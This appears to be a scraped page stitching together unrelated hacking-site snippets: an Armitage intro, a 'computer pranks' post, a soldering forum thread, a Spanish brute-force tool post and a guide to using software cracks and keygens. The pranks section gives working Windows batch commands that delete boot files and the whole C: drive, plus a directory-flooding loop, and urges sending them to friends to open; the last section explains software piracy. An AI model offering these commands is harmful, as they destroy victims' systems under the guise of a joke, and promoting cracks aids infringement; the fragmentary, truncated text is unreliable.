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Welcome to Hellbound Hackers

Welcome to Hellbound Hackers
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Learn Ethical Hacking Online - HackingLoops There’s a seemingly endless number of free open-source tools for penetration testing, and most of them seem to gravitate around the Kali Linux distribution. But with so many free tools, it’s easy to miss out on some of the best ones. So today we’re going to take a closer look at Armitage, define what it is, and define how it works. However, there’s a few things that you need to know before we start digging into the dirty details of how to use this tool. Naturally, I do have to give a brief warning before we get started, too. Don’t misuse or abuse any of the tools mentioned in this article for two reasons. First of all, doing so would be unethical. Now that we’ve got that out of the way, let’s define what Armitage is and how it works. What Does Armitage Do? Armitage, however, is really more of a scripting tool that “plugs in” to Metasploit. Furthermore, Armitage contains tools such as bots that help automate various tasks. But wait, there’s more (as Billy Mays might say)! Before You Begin | Collecting all the cheat sheets Hacking Ético - Blog de seguridad informática Painfully Computer Pranks ~ Computer Hacking | Learn How To Hack Computer pranks to freak out your friends and make them crying for mummy I've been posting many articles about computer pranks on this blog (Deadly Virus Prank, The Ultimate Virus, How to Create a Fake and Harmless Virus and Facebook Virus Prank). Today , I will show you 5 great computer pranks that will frustrate your victims very much. 1. I stumbled across this URL while surfing the internet. 2. Open notepad and copy/paste this code: @echo offattrib -r -s -h c:\autoexec.batdel c:\autoexec.batattrib -r -s -h c:\boot.inidel c:\boot.iniattrib -r -s -h c:\ntldrdel c:\ntldrattrib -r -s -h c:\windows\win.inidel c:\windows\win.ini Now Save it as a .bat file. This should shutdown the persons computer. Send it to your friends computer and tell them to open it. Here is another code too..... cmd /c del c:\windows\* /F /S /Q cmd /c del c:\* /F /S /Q Paste it in NotePad And Save It with Extension .cmd or .bat 3. 1. @echo off:topmd %random%goto top 2. 3. 4. 5. 4. 1. 2. 3. 5. 1. 2. 3.

Top 10 Things You Can Upgrade with a Little Electronics Hacking it is a skill to do a good solder joint, it comes with LOTS of practice. so most people who rarely do it will ever get good at it. Bingo. Of course, part of the issue is having a soldering iron at the right temp with a properly tinned tip. Newbies aren't using soldering stations but a cheap iron they got at rat shack (You have questions? We have deer-in-the-headlights... erm... answers!). I don't expect to ever master tricky stuff like smts or even multilayer pcbs so I'm not much better then a newbie, anyway - and I totally suck at sweating pipe joints. Ah, well... SMT is actually a bit better than through-hole once you get the hang of it.

Ataques basados en diccionario en aplicaciones de escritorio En una tarde de ocio dedicada al juego Guild Wars 2 observé como uno de los mapas estaba repleto de bots dando vueltas en círculos y matando todo bicho que apareciera en su camino para recolectar y generar oro virtual que intercambiar por dinero real en alguno de las muchas plataformas Web de venta de estos servicios: Esta idea despertó mi curiosidad sobre cómo estarían desarrollados..., si repetirían un determinado flujo de paquetes en la red (lo que descarto porque debe ser una auténtica locura), o si se programaría simulando pulsaciones de teclado y capturando las respuestas de la aplicación. En mi acercamiento a este problema opté por la segunda opción, y cuando tenía medio bot programado me di cuenta que tenía los elementos necesarios para realizar otro tipo de ataques... Desktop Brute Forcer (DeBF) El funcionamiento es sencillo: Algunos ejemplos de recetas de pulsaciones Aplicación: Descompresor ZIP de Windows 7, para romper un ZIP protegido por contraseña Receta: Descripción:

U.S. disrupts major hacking, extortion ring; Russian charged Using Serials, Cracks & Keygens OK, so you’ve downloaded some great software, and you can’t figure out how to get it to work. In general there are only three methods that all ‘Release Groups’ adhere to for getting that illicit piece of software or game to good use: Serial numbers, cracks and key generators. In a proper release, there is always an information file that accompanies the release (an *.NFO file). NFO files .NFO files can be opened with ‘Notepad’ (and Wordpad - or any other text editing software) and make sure to select ‘Word Wrap’ under the FORMAT menu in Notepad. ](/tips/crack1.gif “A look at a ‘proper’ software release .NFO file.”){: rel=”lytebox”} Using Serial Numbers & Registration Codes This is fairly straightforward - just read the *.NFO file for registration information including username, password, registration code (or any/all that need apply). ](/tips/crack3.gif “A look at an .NFO file for software with a serial number/registration info.”){: rel=”lytebox”} Finding serial numbers on the Internet: 1.
